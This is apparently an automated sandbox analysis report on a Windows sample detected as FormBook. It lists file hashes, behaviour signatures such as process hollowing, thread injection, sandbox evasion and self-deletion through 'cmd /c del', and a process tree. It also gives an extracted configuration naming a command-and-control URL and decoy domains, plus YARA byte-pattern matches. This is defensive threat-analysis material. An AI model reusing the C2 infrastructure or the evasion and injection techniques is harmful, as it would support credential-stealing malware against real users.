Play interactive tour

Edit tour

Windows Analysis Report 56460021473877.exe

Overview

General Information

Sample Name:	56460021473877.exe
Analysis ID:	502358
MD5:	d95e9bb2fa064a984c391b5bfc1d01e6
SHA1:	6b045974084794b785110909351e2a25950c5ed6
SHA256:	b499be4b6955eebcf4228039f67a65a38b322f0ca1d58d8071de9a428ced8720
Tags:	exeXloader
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for domain / URL

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Self deletion via cmd delete

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

56460021473877.exe (PID: 5240 cmdline: 'C:\Users\user\Desktop\56460021473877.exe' MD5: D95E9BB2FA064A984C391B5BFC1D01E6)

56460021473877.exe (PID: 5276 cmdline: C:\Users\user\Desktop\56460021473877.exe MD5: D95E9BB2FA064A984C391B5BFC1D01E6)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

control.exe (PID: 980 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 7156 cmdline: /c del 'C:\Users\user\Desktop\56460021473877.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nottryingdoing.com/ni8b/"], "decoy": ["billaning.com", "nhmingwei.com", "sapphiremodule.com", "533washingtonave.com", "dlscord-partners.com", "303cf.com", "hooleyfamilygoods.com", "productiongv.com", "intaom.com", "juanmarket.net", "thecrystalconsciousness.com", "sgosthirxz.sbs", "solobookings.com", "formulaonline.xyz", "gulliblegirls.com", "pureselva.com", "rusporn.xxx", "ed-institute.com", "serviciosgeneralesjba.online", "4x4pac.com", "trpgame.com", "shopbeerbelly.com", "box-770.com", "3tshaircreations.com", "nstyle.one", "txsports.club", "chirmano.com", "herehardcore.com", "shoetowers.com", "flipkartsdealscart.xyz", "lechila.com", "aag-trading.com", "werloshop.com", "bcmegroupbrd.xyz", "bogosamba.com", "sehermughal.com", "flexzapato.online", "citestaccnt1631552650.com", "anisyuko.xyz", "norllix.com", "socichat.one", "mia-mania.net", "web3designstudio.com", "eastsidescooters.com", "mymillionmission.com", "media777.club", "undeclined.info", "zhongrct.com", "sifangktv.mobi", "lindseystirlingvip.com", "kiccleaningservicesfl.com", "rafaelelais.com", "davewalkergreenberet.com", "prideparties.com", "ouzoudcaro.com", "ps-sac.com", "holmdelfirst.com", "ville-fogalmam.com", "sellmycarhudsoncounty.com", "celltecstore.com", "australiapost.digital", "rajinderbeas.com", "cabofishingreport.com", "purpari.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ab9:$sqlite3step: 68 34 1C 7B E1 0x6bcc:$sqlite3step: 68 34 1C 7B E1 0x6ae8:$sqlite3text: 68 38 2A 90 C5 0x6c0d:$sqlite3text: 68 38 2A 90 C5 0x6afb:$sqlite3blob: 68 53 D8 7F 8C 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ab9:$sqlite3step: 68 34 1C 7B E1 0x6bcc:$sqlite3step: 68 34 1C 7B E1 0x6ae8:$sqlite3text: 68 38 2A 90 C5 0x6c0d:$sqlite3text: 68 38 2A 90 C5 0x6afb:$sqlite3blob: 68 53 D8 7F 8C 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2340e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x234482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x25bf08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x25c2a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x240195:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x267fb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x23fc81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x267aa1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x240297:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2680b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x24040f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x26822f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x234e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x25ccba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x23eefc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x266d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x235c12:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x25da32:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x245667:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x26d487:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x24670a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x242599:$sqlite3step: 68 34 1C 7B E1 0x2426ac:$sqlite3step: 68 34 1C 7B E1 0x26a3b9:$sqlite3step: 68 34 1C 7B E1 0x26a4cc:$sqlite3step: 68 34 1C 7B E1 0x2425c8:$sqlite3text: 68 38 2A 90 C5 0x2426ed:$sqlite3text: 68 38 2A 90 C5 0x26a3e8:$sqlite3text: 68 38 2A 90 C5 0x26a50d:$sqlite3text: 68 38 2A 90 C5 0x2425db:$sqlite3blob: 68 53 D8 7F 8C 0x242703:$sqlite3blob: 68 53 D8 7F 8C 0x26a3fb:$sqlite3blob: 68 53 D8 7F 8C 0x26a523:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 56460021473877.exe PID: 5240	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.56460021473877.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.56460021473877.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.56460021473877.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
3.2.56460021473877.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.56460021473877.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.56460021473877.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cb9:$sqlite3step: 68 34 1C 7B E1 0x15dcc:$sqlite3step: 68 34 1C 7B E1 0x15ce8:$sqlite3text: 68 38 2A 90 C5 0x15e0d:$sqlite3text: 68 38 2A 90 C5 0x15cfb:$sqlite3blob: 68 53 D8 7F 8C 0x15e23:$sqlite3blob: 68 53 D8 7F 8C
0.2.56460021473877.exe.23f11fc.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.56460021473877.exe.350fe30.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.56460021473877.exe.350fe30.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xcd2b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcd652:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf50d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf5472:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd9365:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x101185:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd8e51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x100c71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd9467:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x101287:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd95df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1013ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xce06a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf5e8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd80cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xffeec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xcede2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf6c02:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xde837:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x106657:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xdf8da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.56460021473877.exe.350fe30.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xdb769:$sqlite3step: 68 34 1C 7B E1 0xdb87c:$sqlite3step: 68 34 1C 7B E1 0x103589:$sqlite3step: 68 34 1C 7B E1 0x10369c:$sqlite3step: 68 34 1C 7B E1 0xdb798:$sqlite3text: 68 38 2A 90 C5 0xdb8bd:$sqlite3text: 68 38 2A 90 C5 0x1035b8:$sqlite3text: 68 38 2A 90 C5 0x1036dd:$sqlite3text: 68 38 2A 90 C5 0xdb7ab:$sqlite3blob: 68 53 D8 7F 8C 0xdb8d3:$sqlite3blob: 68 53 D8 7F 8C 0x1035cb:$sqlite3blob: 68 53 D8 7F 8C 0x1036f3:$sqlite3blob: 68 53 D8 7F 8C
0.2.56460021473877.exe.34c5c10.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.56460021473877.exe.34c5c10.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1174d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x117872:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13f2f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13f692:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x123585:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14b3a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x123071:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14ae91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x123687:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b4a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1237ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x14b61f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11828a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1400aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1222ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x14a10c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x119002:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x140e22:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x128a57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x150877:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x129afa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.56460021473877.exe.34c5c10.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x125989:$sqlite3step: 68 34 1C 7B E1 0x125a9c:$sqlite3step: 68 34 1C 7B E1 0x14d7a9:$sqlite3step: 68 34 1C 7B E1 0x14d8bc:$sqlite3step: 68 34 1C 7B E1 0x1259b8:$sqlite3text: 68 38 2A 90 C5 0x125add:$sqlite3text: 68 38 2A 90 C5 0x14d7d8:$sqlite3text: 68 38 2A 90 C5 0x14d8fd:$sqlite3text: 68 38 2A 90 C5 0x1259cb:$sqlite3blob: 68 53 D8 7F 8C 0x125af3:$sqlite3blob: 68 53 D8 7F 8C 0x14d7eb:$sqlite3blob: 68 53 D8 7F 8C 0x14d913:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.nottryingdoing.com/ni8b/"], "decoy": ["billaning.com", "nhmingwei.com", "sapphiremodule.com", "533washingtonave.com", "dlscord-partners.com", "303cf.com", "hooleyfamilygoods.com", "productiongv.com", "intaom.com", "juanmarket.net", "thecrystalconsciousness.com", "sgosthirxz.sbs", "solobookings.com", "formulaonline.xyz", "gulliblegirls.com", "pureselva.com", "rusporn.xxx", "ed-institute.com", "serviciosgeneralesjba.online", "4x4pac.com", "trpgame.com", "shopbeerbelly.com", "box-770.com", "3tshaircreations.com", "nstyle.one", "txsports.club", "chirmano.com", "herehardcore.com", "shoetowers.com", "flipkartsdealscart.xyz", "lechila.com", "aag-trading.com", "werloshop.com", "bcmegroupbrd.xyz", "bogosamba.com", "sehermughal.com", "flexzapato.online", "citestaccnt1631552650.com", "anisyuko.xyz", "norllix.com", "socichat.one", "mia-mania.net", "web3designstudio.com", "eastsidescooters.com", "mymillionmission.com", "media777.club", "undeclined.info", "zhongrct.com", "sifangktv.mobi", "lindseystirlingvip.com", "kiccleaningservicesfl.com", "rafaelelais.com", "davewalkergreenberet.com", "prideparties.com", "ouzoudcaro.com", "ps-sac.com", "holmdelfirst.com", "ville-fogalmam.com", "sellmycarhudsoncounty.com", "celltecstore.com", "australiapost.digital", "rajinderbeas.com", "cabofishingreport.com", "purpari.com"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
